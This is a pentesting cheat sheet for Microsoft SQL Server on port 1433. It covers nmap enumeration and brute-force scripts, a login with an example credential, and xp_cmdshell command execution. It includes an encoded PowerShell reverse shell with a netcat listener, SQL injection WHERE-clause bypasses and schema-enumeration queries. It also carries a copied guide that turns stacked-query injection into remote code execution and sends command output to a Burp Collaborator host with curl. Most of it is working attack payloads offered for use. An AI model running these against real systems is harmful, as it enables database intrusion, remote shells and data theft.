Skip to content

1433 - Pentesting mssql

MS SQL, or Microsoft SQL Server, is a relational database management system (RDBMS) developed by Microsoft. It is a popular database system used for storing and retrieving data for a wide range of applications, including web-based applications, data warehousing, and business intelligence.

nmap

sudo nmap -p 1433 -Pn -sC -sV -vv $IP
|->
1433/tcp  Microsoft SQL Server 2019 15.00.2000.00; RTM

sudo nmap --script ms-sql-info -p 1433 $IP
sudo nmap --script ms-sql-empty-password -p 1433 $IP
sudo nmap --script ms-sql-ntlm-info -p 1433 $IP
sudo nmap --script ms-sql-dac -p 1433 $IP
sudo nmap --script ms-sql-dump-hashes -p 1433 $IP
ls -la /usr/share/nmap/scripts/ms-sql-*

sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 $IP

sudo nmap -p 1433 --script ms-sql-brute --script-args userdb=user.txt,passdb=pass.txt $IP

connect with mssqlclient.py

mssqlclient.py 

/opt/tools/impacket/examples/mssqlclient.py -port 1433 netdb:'D@ta_bAse_adm1n!'@172.16.7.60

command execution

SQL>enable_xp_cmdshell
SQL>xp_cmdshell whoami
SQL>xp_cmdshell dir
SQL>xp_cmdshell powershell -c "ls"
rev-shell 
SQL>xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAxADYALgA3AC4AMgA0ADAAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

#https://www.revshells.com/ -> PowerShell #3 (Base64)

nc -lnvp 4444

bypass sql where clause

query 

Select * from users WHERE user id = 1 AND {USER_PAYLOAD} AND user_type = 'not_admin';
bypass examples 
1=1 OR 1=1 -- lorem
'1'='1' OR '1'='1' -- lorem
2>1 OR 2>1 -- lorem

1=1); select * from users; -- lorem
'1'='1'); select * from users; -- lorem
2>1); select * from users; -- lorem

usefull querys

version 

SELECT $$version
information about the database 
SELECT * FROM INFORMATION_SCHEMA.TABLES
databases 
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), name), ',') from master.dbo.sysdatabases)
tables 
SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), TABLE_NAME), ',') from INFORMATION_SCHEMA.COLUMNS)
columns 
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), COLUMN_NAME), ',') from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users') 

select null, COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users'
runtimes 
(select TOP 1 STRING_AGG(CONVERT(NVARCHAR(max), ROUTINE_NAME), ',') from INFORMATION_SCHEMA.ROUTINES)
functions 
(Select APP_NAME())
(Select DB_ID())
(Select DB_NAME())
(Select ORIGINAL_DB_NAME())
(Select SCHEMA_ID())
(Select SCHEMA_NAME()) 
(Select SCOPE_IDENTITY())  
(Select VERSION())
(Select SERVERPROPERTY('BuildClrVersion'))
(Select SERVERPROPERTY('Collation'))  
(Select SERVERPROPERTY('CollationID'))  
(Select SERVERPROPERTY('ComparisonStyle'))  
(Select SERVERPROPERTY('ComputerNamePhysicalNetBIOS'))  
(Select SERVERPROPERTY('Edition'))  
(Select SERVERPROPERTY('EditionID'))  
(Select SERVERPROPERTY('EngineEdition'))  
(Select SERVERPROPERTY('FilestreamConfiguredLevel'))  
(Select SERVERPROPERTY('FilestreamEffectiveLevel'))  
(Select SERVERPROPERTY('FilestreamShareName'))  
(Select SERVERPROPERTY('HadrManagerStatus'))  
(Select SERVERPROPERTY('InstanceDefaultBackupPath'))  
(Select SERVERPROPERTY('InstanceDefaultDataPath'))  
(Select SERVERPROPERTY('InstanceDefaultLogPath'))  
(Select SERVERPROPERTY('InstanceName'))  
(Select SERVERPROPERTY('IsAdvancedAnalyticsInstalled'))  
(Select SERVERPROPERTY('IsBigDataCluster'))  
(Select SERVERPROPERTY('IsClustered'))  
(Select SERVERPROPERTY('IsExternalAuthenticationOnly'))  
(Select SERVERPROPERTY('IsFullTextInstalled'))  
(Select SERVERPROPERTY('IsHadrEnabled'))  
(Select SERVERPROPERTY('IsIntegratedSecurityOnly'))  
(Select SERVERPROPERTY('IsLocalDB'))  
(Select SERVERPROPERTY('IsPolyBaseInstalled'))  
(Select SERVERPROPERTY('IsServerSuspendedForSnapshotBackup'))  
(Select SERVERPROPERTY('IsSingleUser'))  
(Select SERVERPROPERTY('IsTempDbMetadataMemoryOptimized'))  
(Select SERVERPROPERTY('IsXTPSupported'))  
(Select SERVERPROPERTY('LCID'))  
(Select SERVERPROPERTY('LicenseType'))  
(Select SERVERPROPERTY('MachineName'))  
(Select SERVERPROPERTY('NumLicenses'))  
(Select SERVERPROPERTY('PathSeparator'))  
(Select SERVERPROPERTY('ProcessID'))  
(Select SERVERPROPERTY('ProductBuild'))  
(Select SERVERPROPERTY('ProductBuildType'))  
(Select SERVERPROPERTY('ProductLevel'))  
(Select SERVERPROPERTY('ProductMajorVersion'))  
(Select SERVERPROPERTY('ProductMinorVersion'))  
(Select SERVERPROPERTY('ProductUpdateLevel'))  
(Select SERVERPROPERTY('ProductUpdateReference'))  
(Select SERVERPROPERTY('ProductVersion'))  
(Select SERVERPROPERTY('ResourceLastUpdateDateTime'))  
(Select SERVERPROPERTY('ResourceVersion'))  
(Select SERVERPROPERTY('ServerName'))  
(Select SERVERPROPERTY('SqlCharSet'))  
(Select SERVERPROPERTY('SqlCharSetName'))  
(Select SERVERPROPERTY('SqlSortOrder'))  
(Select SERVERPROPERTY('SqlSortOrderName'))  
(Select SERVERPROPERTY('SuspendedDatabaseCount'))

RCE

https://blooserpent.medium.com/mssql-injection-to-rce-guide-read-output-of-xp-cmdshell-b8216857c36 

# MSSQL Injection to RCE Guide: Read Output of xp_cmdshell

Unlike in MySQL, MSSQL offers `xp_cmdshell` , which allows us to execute system commands

> **HINT**
> 
> In **xp_cmdshell**, most of the time we are privileged to use **cmd** and most importantly, **powershell.** Now, we will use **curl** in powershell to send command outputs to our controlled server.

What we need:  
> MSSQL Injection Vuln Site  
> BurpSuite Collaborator or Ngrok

# Check if we can stack queries

For example, we built our injection query like this:

`123' UNION SELECT 1,2,3,4,5-- -`

Now let’s check if we can do [stacked queries](https://www.sqlinjection.net/stacked-queries/)

`123' UNION SELECT 1,2,3,4,5; WAITFOR DELAY '0:0:8'-- -`

If it `sleeps` for 8 seconds, we can proceed to the next step.

# **Checking Privileges**

If we can do stack queries, let’s check if we can use `xp_cmdshell`. The paragraph below is from [A Not-So-Blind RCE with SQL Injection](https://medium.com/@notsoshant/a-not-so-blind-rce-with-sql-injection-13838026331e) by [@notsoshant](http://twitter.com/notsoshant)

> The next step here is to check if the DB user is a `sysadmin` or not, since only `sysadmin` can enable `xp_cmdshell` and execute OS level commands, which is our ultimate goal here.
> 
> Here I would like to introduce an [awesome SQL Injection Cheat Sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) that I use. It is from pentestmonkey. Looking at this cheat sheet, we find that we can use `SELECT is_srvrolemember('sysadmin')` query to figure out if our current DB user is `sysadmin` or not. Let's try that:

![](https://miro.medium.com/v2/resize:fit:700/0*ht85RT3S3FMN9ryg.png)

> Since we get a `1` in the response, we can confirm that the current DB user is indeed a `sysadmin`.

`123' UNION SELECT 1,is_srvrolemember('sysadmin'),3,4,5-- -`

If your response returned `1`, then do the following after:

123' UNION SELECT 1,2,3,4,5; EXEC sp_configure 'show advanced options', 1-- -123' UNION SELECT 1,2,3,4,5; RECONFIGURE-- -123' UNION SELECT 1,2,3,4,5; EXEC sp_configure 'xp_cmdshell', 1-- -123' UNION SELECT 1,2,3,4,5; RECONFIGURE-- -

After these, test if we can execute command using xp_cmdshell

First, start a new **BurpCollaborator Client**. This is only available for the paid BurpSuite. If you don’t have one, just use `ngrok` as alternative.

![](https://miro.medium.com/v2/resize:fit:700/1*yjx3gs6AL01sB_rbWb0fKg.png)

Copy your own burp collaborator link. This varies person-to-person. Mine is `v626e8p83z8d7o1zsklzm2716sci07.burpcollaborator.net`

Then `ping` our burpcollab client

123' UNION SELECT 1,2,3,4,5; EXEC xp_cmdshell 'ping v626e8p83z8d7o1zsklzm2716sci07.burpcollaborator.net'-- -

If the server is executing our commands, we must see an interaction back at our burpcollaborator.

**BOOM!** We got a DNS Interaction. This confirms that our commands are really executed.

# Reading the Command Output

Here is an explanation of the query below. In `powershell`, we can assign variables with `$var`. I used this to assign a variable to the output of our command. After assigning a variable, I `concatenated` this variable with our burp collaborator link. With the help of `curl`, it results to a HTTP request to `http://YOURBURPCOLLAB.burpcollaborator.net/get?output=OUTPUT OF COMMAND`

123' UNION SELECT 1,2,3,4,5; EXEC xp_cmdshell 'powershell -c "$x = whoami; curl http://YOURBURPCOLLAB.burpcollaborator.net/get?output=$x" '-- -

_Just change_ `whoami` _to any other command you want_

We must see a new HTTP Interaction with the command output in the GET Parameter